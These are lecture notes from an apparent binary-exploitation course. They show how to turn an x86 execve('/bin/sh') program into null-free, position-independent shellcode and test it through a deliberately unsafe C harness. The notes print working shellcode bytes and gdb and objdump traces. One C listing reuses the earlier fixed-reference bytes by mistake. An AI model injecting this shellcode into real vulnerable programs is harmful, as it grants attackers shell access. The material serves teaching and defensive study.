Lec. 10: Making Shell Code Exploit Ready
Table of Contents
1 Review: x86 Shell Code
Recall that we can write a bit of shell code like so:
;; execve.asm - execute "/bin/sh" and exit if you fail SECTION .data ; Data section shell: db "/bin/sh",0 ; The program we want to run - "/bin/sh" SECTION .text ; Code section global _start ; Make label available to linker _start: ; Standard ld entry point push 0 ; args[1] - NULL push shell ; args[0] - "/bin/sh" mov edx,0 ; Param #3 - NULL mov ecx,esp ; Param #2 - address of args array mov ebx,shell ; Param #1 - "/bin/sh" mov eax,0xb ; System call number for execve int 0x80 ; Interrupt 80 hex - invoke system call mov ebx,0 ; Exit code, 0 = normal mov eax,1 ; System call number for exit int 0x80 ; Interrupt 80 hex - invoke system call
This program will execute a shell, and we can see that by assembling
and linking the program using nasm
and ld
user@si485H-base:demo$ nasm -f elf execve_fixedref.asm -o execve_fixedref.o; ld execve_fixedref.o -o execve_fixedref user@si485H-base:demo$ ./execve_fixedref $ echo "SHELL" SHELL $
However, this shell code is not eady for prime time. There are few things we need to fix. First we need to look at the shell code as its raw bytes of the instruction. Later, we'll need to both fix the references as well as remove NULL bytes.
2 Shell code as bytes
The next thing we want to do is represent the program we wrote in raw
bytes. To do that, let's look at the objdump
output:
user@si485H-base:demo$ objdump -d -M intel execve_fixedref execve: file format elf32-i386 Disassembly of section .text: 08048080 <_start>: 8048080: 6a 00 push 0x0 8048082: 68 a8 90 04 08 push 0x80490a8 8048087: ba 00 00 00 00 mov edx,0x0 804808c: 89 e1 mov ecx,esp 804808e: bb a8 90 04 08 mov ebx,0x80490a8 8048093: b8 0b 00 00 00 mov eax,0xb 8048098: cd 80 int 0x80 804809a: bb 00 00 00 00 mov ebx,0x0 804809f: b8 01 00 00 00 mov eax,0x1 80480a4: cd 80 int 0x80
The byte valus for the instructions are clearly listed, and we can
extract them with a nifty little program I wrote in python called hexify
:
bytes=$(objdump -d $1 | grep 804 | grep -v ">:" | cut -f 2 | tr " " "\n" | tr -s "\n" ) hex=$(echo $bytes | python -c "import sys,re; print ''.join(r'\x%s'%c for c in sys.stdin.read().split())") echo "$hex"
Running this on the program, we get the following hex escaped string:
user@si485H-base:demo$ ./hexify.sh execve_fixedref \x6a\x00\x68\xa8\x90\x04\x08\xba\x00\x00\x00\x00\x89\xe1\xbb\xa8\x90\x04\x08\xb8\x0b\x00\x00\x00\xcd\x80\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80
3 Fixed references suck
The raw bytes we had above is shell code, but not quite. To test it out, we can try and execute in some c-code by casting it a function pointer.
int main(){ char * code = "\x6a\x00\x68\xa8\x90\x04\x08\xba\x00\x00" "\x00\x00\x89\xe1\xbb\xa8\x90\x04\x08\xb8" "\x0b\x00\x00\x00\xcd\x80\xbb\x00\x00\x00" "\x00\xb8\x01\x00\x00\x00\xcd\x80"; //cast pointer to function pointer and call ((void(*)(void)) code)(); }
If we then go ahead and try and execute this program, it doesn't work as expected (or at all). To see why, we need to open it up in gdb:
(gdb) ds main Dump of assembler code for function main: 0x080483ed <+0>: push ebp 0x080483ee <+1>: mov ebp,esp 0x080483f0 <+3>: and esp,0xfffffff0 0x080483f3 <+6>: sub esp,0x10 0x080483f6 <+9>: mov DWORD PTR [esp+0xc],0x80484a0 0x080483fe <+17>: mov eax,DWORD PTR [esp+0xc] 0x08048402 <+21>: call eax 0x08048404 <+23>: leave 0x08048405 <+24>: ret End of assembler dump. (gdb) x/10i 0x80484a0 0x80484a0: push 0x0 0x80484a2: push 0x80490a8 0x80484a7: mov edx,0x0 0x80484ac: mov ecx,esp 0x80484ae: mov ebx,0x80490a8 0x80484b3: mov eax,0xb 0x80484b8: int 0x80 0x80484ba: mov ebx,0x0 0x80484bf: mov eax,0x1 0x80484c4: int 0x80
First we see that in main we call address 0x80484a0, and if we examine that address, we find our hello world program. But, there is a problem. We are pushing onto the stack the address 0x80490a8 which should be our "/bin/sh" string, but that reference is broken.
(gdb) x/s 0x80490a8 0x80490a8: <error: Cannot access memory at address 0x80490a8>
Our shell code doesn't work because we have fixed references, instead we need to do something different
4 Jmp-Callback
To remove fixed references, we need to use instructions that will calculate a reference for us. There are a few ways to do this, but we will use the stand Jmp-Callback trick. Consider the reviced code below:
SECTION .text ; Code section global _start ; Make label available to linker _start: ; Standard ld entry point jmp callback dowork: pop esi ; esi now holds address of "/bin/sh push 0 ; args[1] - NULL push esi ; args[0] - "/bin/sh" mov edx,0 ; Param #3 - NULL mov ecx,esp ; Param #2 - address of args array mov ebx,esi ; Param #1 - "/bin/sh" mov eax,0xb ; System call number for execve int 0x80 ; Interrupt 80 hex - invoke system call mov ebx,0 ; Exit code, 0 = normal mov eax,1 ; System call number for exit int 0x80 ; Interrupt 80 hex - invoke system call callback: call dowork ; call pushes the next address onto stack, ; which is address of "/bin/sh" db "/bin/sh",0 ;
The first thing that happens in _start
is we jump to the callback
tag, which in terns call's the dowork
. That might seem like a lot of
indirection, but from that indirection we gain the reference to the
string "/bin/sh".
Why? A call command not only jumps to the reference indicated, but it
will also push onto the stack the return address. The return address
is the next address to execute, which in the case above is address
of the data command for "/bin/sh" … exactly what we need. At
dowork
we can pop the return address off the stack, i.e., the
address of the string "/bin/sh" and use that address. In particular,
we save that address in the esi
register.
Now, we can hexify and insert that code into C and see if that works:
int main(){ char * code = "\x6a\x00\x68\xa8\x90\x04\x08\xba\x00\x00" "\x00\x00\x89\xe1\xbb\xa8\x90\x04\x08\xb8" "\x0b\x00\x00\x00\xcd\x80\xbb\x00\x00\x00" "\x00\xb8\x01\x00\x00\x00\xcd\x80"; //cast pointer to function pointer and call ((void(*)(void)) code)(); }
user@si485H-base:demo$ gcc execve_jmpcall.c -o execve_jmpcall user@si485H-base:demo$ ./execve_jmpcall $
And now we are in business … sort of.
5 Null Bytes are the ENEMY
The next challenge is using our shell code through an exploit. We won't do that exactly, but we can simulate what that might be like with this simple program:
#include <string.h> int main(int argc, char *argv[]){ char code[1024]; strncpy(code,argv[1],1024); //cast pointer to function pointer and call ((void(*)(void)) code)(); }
The program simply reads a command line arguments, loads it into a buffer, and then executes the buffer. This is essentially what we want to happen when we exploit a program, but a lot of the work is done for us.
What we'd like to happen is that we can do this with our shell code hex:
user@si485H-base:demo$ ./hexify.sh execve_jmpcall \xeb\x20\x5e\x6a\x00\x56\xba\x00\x00\x00\x00\x89\xe1\x89\xf3\xb8\x0b\x00\x00\x00\xcd\x80\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68 user@si485H-base:demo$ ./dummy_exploit $(printf "\xeb\x20\x5e\x6a\x00\x56\xba\x00\x00\x00\x00\x89\xe1\x89\xf3\xb8\x0b\x00\x00\x00\xcd\x80\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68") Segmentation fault (core dumped)
We have a problem. Let's execute this under gdb, and we can see where the problem arises:
(gdb) ds main Dump of assembler code for function main: 0x0804841d <+0>: push ebp 0x0804841e <+1>: mov ebp,esp 0x08048420 <+3>: and esp,0xfffffff0 0x08048423 <+6>: sub esp,0x410 0x08048429 <+12>: mov eax,DWORD PTR [ebp+0xc] 0x0804842c <+15>: add eax,0x4 0x0804842f <+18>: mov eax,DWORD PTR [eax] 0x08048431 <+20>: mov DWORD PTR [esp+0x8],0x400 0x08048439 <+28>: mov DWORD PTR [esp+0x4],eax 0x0804843d <+32>: lea eax,[esp+0x10] 0x08048441 <+36>: mov DWORD PTR [esp],eax 0x08048444 <+39>: call 0x8048310 <strncpy@plt> 0x08048449 <+44>: lea eax,[esp+0x10] 0x0804844d <+48>: call eax 0x0804844f <+50>: leave 0x08048450 <+51>: ret End of assembler dump. (gdb) br *0x0804844d Breakpoint 1 at 0x804844d (gdb) r $(printf "\xeb\x20\x5e\x6a\x00\x56\xba\x00\x00\x00\x00\x89\xe1\x89\xf3\xb8\x0b\x00\x00\x00\xcd\x80\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68") Starting program: /home/user/git/si485-binary-exploits/lec/09/demo/dummy_exploit $(printf "\xeb\x20\x5e\x6a\x00\x56\xba\x00\x00\x00\x00\x89\xe1\x89\xf3\xb8\x0b\x00\x00\x00\xcd\x80\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68") Breakpoint 1, 0x0804844d in main () (gdb) x/10i $esp+0x10 0xbffff250: jmp 0xbffff252 0xbffff252: add BYTE PTR [eax],al 0xbffff254: add BYTE PTR [eax],al 0xbffff256: add BYTE PTR [eax],al 0xbffff258: add BYTE PTR [eax],al 0xbffff25a: add BYTE PTR [eax],al 0xbffff25c: add BYTE PTR [eax],al 0xbffff25e: add BYTE PTR [eax],al 0xbffff260: add BYTE PTR [eax],al 0xbffff262: add BYTE PTR [eax],al
In the above gdb execution, first we set a break point right before
the call so that we can inspect the address that will be called,
$esp+0x10
. Unfortunately, if we look closely, we see that the jmp is
there, which is our first command, but then we are in trouble. There
are a bunch of nonsense commands.
What happened? Lets look more closely at our command line argument:
$(printf "\xeb\x20\x5e\x6a\x00\x56\xba\x00\x00\x00\x00\x89\xe1\x89\xf3\xb8\x0b\x00\x00\x00\xcd\x80\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68")
You see that 5 bytes in, there is a NULL (\x00) which means the
strcpy()
command will stop copying there.
We need to remove NULL bytes!
6 Removing NULL bytes
To remove NULL bytes, we need to get creative. Let's look at the objdump of our previous version of the shell code to get a sense of where we are at.
user@si485H-base:demo$ objdump -d -M intel execve_calljmp execve_calljmp: file format elf32-i386 Disassembly of section .text: 08048060 <_start>: 8048060: eb 20 jmp 8048082 <callback> 08048062 <dowork>: 8048062: 5e pop esi 8048063: 6a 00 push 0x0 8048065: 56 push esi 8048066: ba 00 00 00 00 mov edx,0x0 804806b: 89 e1 mov ecx,esp 804806d: 89 f3 mov ebx,esi 804806f: b8 0b 00 00 00 mov eax,0xb 8048074: cd 80 int 0x80 8048076: bb 00 00 00 00 mov ebx,0x0 804807b: b8 01 00 00 00 mov eax,0x1 8048080: cd 80 int 0x80 08048082 <callback>: 8048082: e8 db ff ff ff call 8048062 <dowork> 8048087: 2f das 8048088: 62 69 6e bound ebp,QWORD PTR [ecx+0x6e] 804808b: 2f das 804808c: 73 68 jae 80480f6 <callback+0x74>
You can see where the NULL's come from. There are two big problems:
push 0x0
: pushing null on the stack requires a null value in the bytespush e*x
: pushing a 4 byte register storing 1 byte of values require null bytes
To solve one of these problem, we need to create NULL bytes without
actually writing any NULL bytes. The most affective way to do this is
with xor. Recall that the xor of a value with itself is always
zero. To solve the other problem, we need to make sure we use BYTE
PTR's instead of DWORD PTR's, which means using the al
bl
cl
and
dl
registers. We can write our code like so.
SECTION .text ; Code section global _start ; Make label available to linker _start: ; Standard ld entry point jmp callback dowork: pop esi ; esi now holds address of "/bin/sh xor eax,eax ; zero out eax push eax ; args[1] - NULL push esi ; args[0] - "/bin/sh" xor edx,edx ; Param #3 - NULL (zero out edx) mov ecx,esp ; Param #2 - address of args array mov ebx,esi ; Param #1 - "/bin/sh" mov al,0xb ; System call number for execve (use al mov) int 0x80 ; Interrupt 80 hex - invoke system call xor ebx,ebx ; Exit code, 0 = normal xor eax,eax ; zero eax mov al,1 ; System call number for exit int 0x80 ; Interrupt 80 hex - invoke system call callback: call dowork ; call pushes the next address onto stack, ; which is address of "/bin/sh" db "/bin/sh",0 ;
And if we now look at the objdump, there is not a NULL to be found:
user@si485H-base:demo$ objdump -d -M intel execve_nonull execve_nonull: file format elf32-i386 Disassembly of section .text: 08048060 <_start>: 8048060: eb 17 jmp 8048079 <callback> 08048062 <dowork>: 8048062: 5e pop esi 8048063: 31 c0 xor eax,eax 8048065: 50 push eax 8048066: 56 push esi 8048067: 31 d2 xor edx,edx 8048069: 89 e1 mov ecx,esp 804806b: 89 f3 mov ebx,esi 804806d: b0 0b mov al,0xb 804806f: cd 80 int 0x80 8048071: 31 db xor ebx,ebx 8048073: 31 c0 xor eax,eax 8048075: b0 01 mov al,0x1 8048077: cd 80 int 0x80 08048079 <callback>: 8048079: e8 e4 ff ff ff call 8048062 <dowork> 804807e: 2f das 804807f: 62 69 6e bound ebp,QWORD PTR [ecx+0x6e] 8048082: 2f das 8048083: 73 68 jae 80480ed <callback+0x74> ...
Finally, we can use our shell code in the dummy exploit with success:
user@si485H-base:demo$ ./hexify.sh execve_nonull \xeb\x17\x5e\x31\xc0\x50\x56\x31\xd2\x89\xe1\x89\xf3\xb0\x0b\xcd\x80\x31\xdb\x31\xc0\xb0\x01\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68 user@si485H-base:demo$ ./dummy_exploit $(printf "\xeb\x17\x5e\x31\xc0\x50\x56\x31\xd2\x89\xe1\x89\xf3\xb0\x0b\xcd\x80\x31\xdb\x31\xc0\xb0\x01\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68") $